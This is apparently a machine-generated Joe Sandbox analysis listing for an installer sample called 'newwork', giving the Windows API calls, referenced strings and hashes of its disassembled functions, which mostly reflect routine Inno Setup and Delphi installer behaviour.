• Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
• Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

                                                                                        Control-flow Graph
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                        • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                        • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModulePolicyProcess
                                                                                        • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                        • API String ID: 3256987805-3653653586
                                                                                        • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                        • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                        • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                        • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                        APIs
                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                        • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                        • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$Prop
                                                                                        • String ID: 3A$yA
                                                                                        • API String ID: 3887896539-3278460822
                                                                                        • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                        • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                        • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                        • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                                        Control-flow Graph
                                                                                        APIs
                                                                                        • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                        • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                          • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                          • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                        • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                        • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                        • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                        • String ID: c:\directory$shell32.dll$%H
                                                                                        • API String ID: 3376378930-166502273
                                                                                        • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                        • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                        • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                        • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                                                        APIs
                                                                                        • GetActiveWindow.USER32 ref: 0042F58F
                                                                                        • GetFocus.USER32 ref: 0042F597
                                                                                        • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                        • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                        • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                        • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                        • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                        • String ID: TWindowDisabler-Window
                                                                                        • API String ID: 3167913817-1824977358
                                                                                        • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                        • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                                        • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                        • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                        • API String ID: 1646373207-2130885113
                                                                                        • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                        • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                                                        • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                        • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                                                        APIs
                                                                                        • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                                        • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                                        • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                        • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                        • API String ID: 4130936913-2943970505
                                                                                        • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                        • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                                        • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                        • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                                        • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                          • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                          • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                          • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                          • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                        • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                        • API String ID: 854858120-615399546
                                                                                        • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                        • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                                        • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                        • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                                        APIs
                                                                                        • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                        • OemToCharA.USER32(?,?), ref: 0042375C
                                                                                        • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Char$FileIconLoadLowerModuleName
• String ID: 2$MAINICON
• API String ID: 3935243913-3181700818
APIs
• GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
• GetCurrentThreadId.KERNEL32 ref: 00418F79
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
  • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
  • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
  • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
  • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
  • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
  • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
  • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
  • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
  • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
  • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
  • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
  • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
Similarity
• API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
• String ID: ControlOfs%.8X%.8X$Delphi%.8X
• API String ID: 316262546-2767913252
APIs
• SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
• GetWindowLongA.USER32(?,000000F0), ref: 0041366F
• GetWindowLongA.USER32(?,000000F4), ref: 00413681
• SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
• SetPropA.USER32(?,00000000,00000000), ref: 004136AB
• SetPropA.USER32(?,00000000,00000000), ref: 004136C2
Similarity
• API ID: LongWindow$Prop
• String ID:
• API String ID: 3887896539-0
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
Strings
• WININIT.INI, xrefs: 004557E4
• PendingFileRenameOperations, xrefs: 00455754
• PendingFileRenameOperations2, xrefs: 00455784
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
• API String ID: 47109696-2199428270
APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
• GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: Created temporary directory: $\_setup64.tmp$_isetup
• API String ID: 1375471231-2952887711
APIs
• EnumWindows.USER32(00423A1C), ref: 00423AA8
• GetWindow.USER32(?,00000003), ref: 00423ABD
• GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
• SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
Similarity
• API ID: Window$EnumLongWindows
• String ID: \AB
• API String ID: 4191631535-3948367934
APIs
• RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
Similarity
• API ID: AddressDeleteHandleModuleProc
• String ID: RegDeleteKeyExA$advapi32.dll
• API String ID: 588496660-1846899949
Strings
• PrepareToInstall failed: %s, xrefs: 0046BE6E
• NextButtonClick, xrefs: 0046BC4C
• Need to restart Windows? %s, xrefs: 0046BE95
Similarity
• API ID:
• String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
• API String ID: 0-2329492092
APIs
• SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
• SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                        Similarity
                                                                                        • API ID: ActiveChangeNotifyWindow
                                                                                        • String ID: $Need to restart Windows? %s
                                                                                        • API String ID: 1160245247-4200181552
                                                                                        APIs
                                                                                          • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                        • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                        • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                        • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                        • String ID: Creating directory: %s
                                                                                        • API String ID: 2451617938-483064649
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressByteCharMultiProcWide
                                                                                        • String ID: SfcIsFileProtected$sfc.dll
                                                                                        • API String ID: 2508298434-591603554
                                                                                        APIs
                                                                                        • 74D41520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                        • 74D41500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                        • 74D41540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: D41500D41520D41540
                                                                                        • String ID: %E
                                                                                        • API String ID: 2153611984-175436132
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0044B401
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ObjectReleaseSelect
                                                                                        • String ID: %H
                                                                                        • API String ID: 1831053106-1959103961
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                        • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                        • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: DrawText$ByteCharMultiWide
                                                                                        • String ID: %H
                                                                                        • API String ID: 65125430-1959103961
                                                                                        APIs
                                                                                        • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                        • String ID: SHAutoComplete$shlwapi.dll
                                                                                        • API String ID: 395431579-1506664499
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                        Strings
                                                                                        • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                        • PendingFileRenameOperations, xrefs: 00455A40
                                                                                        • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                        • API String ID: 47109696-2115312317
                                                                                        APIs
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                        • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                                                        • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileNext
                                                                                        • String ID:
                                                                                        • API String ID: 2066263336-0
                                                                                        APIs
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                        • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                        • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileNext
                                                                                        • String ID:
                                                                                        • API String ID: 2066263336-0
                                                                                        • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                        • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                        • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                        • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                        APIs
                                                                                        • GetMenu.USER32(00000000), ref: 00421361
                                                                                        • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                        • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                        • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                        Memory Dump Source
